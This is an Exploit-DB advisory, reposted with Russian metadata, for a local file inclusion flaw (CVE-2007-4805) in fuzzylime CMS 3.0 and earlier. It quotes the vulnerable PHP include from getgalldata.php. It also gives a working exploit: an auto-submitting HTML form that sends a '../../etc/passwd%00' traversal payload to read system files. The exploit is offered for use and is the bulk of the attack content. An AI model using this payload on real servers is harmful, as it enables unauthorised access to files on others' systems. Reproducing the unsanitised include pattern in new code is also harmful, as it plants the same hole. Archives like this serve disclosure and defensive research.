- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4378
- Проверка EDB
-
- Пройдено
- Автор
- NOT SEC GROUP
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-4805
- Дата публикации
- 2007-09-08
HTML:
########################################################################
#################
#
# not sec group
# http://www.notsec.com [email protected]
#
#
# [fuzzylime (cms) <= 3.0]
#
# Class: Local File Inclusion
# Found: 08/09/2007
# Site: http://cms.fuzzylime.co.uk/
#Download: http://cms.fuzzylime.co.uk/files/cms.zip
#Author: [wHITe_ShEEp] of notsec
#Contact: [email protected] - http://www.notsec.com
#
########################################################################
#################
vulnerable code:
[cms]/code/getgalldata.php
______________________________________________________
1: <?
2: $p = $_POST[p];
3: $m = $_POST[img];
4: $m = "e$m";
5: $entrytype = "gallery";
6: include "../gallery/$p.inc.php";
7: include "settings.inc.php";
8: include "../$admindir/languages/english.inc.php";
...
41: ?>
_______________________________________________________
Exploit: ( Work only with magic_quotes_gpc = Off )
_______________________________________________________
<html>
<body onload="document.myform.submit()">
<form name="myform" action="http://www.site.com/[fuzzylime]/code/
getgalldata.php" method="post">
<input name="p" type="text" size="30" value="../../../../../../../../
etc/passwd%00" />
</form>
</html>
________________________________________________________
Thanks to:
________________________________________________________
All notsec.com members;
r00t for testing;
________________________________________________________
# milw0rm.com [2007-09-08]
- Источник
- www.exploit-db.com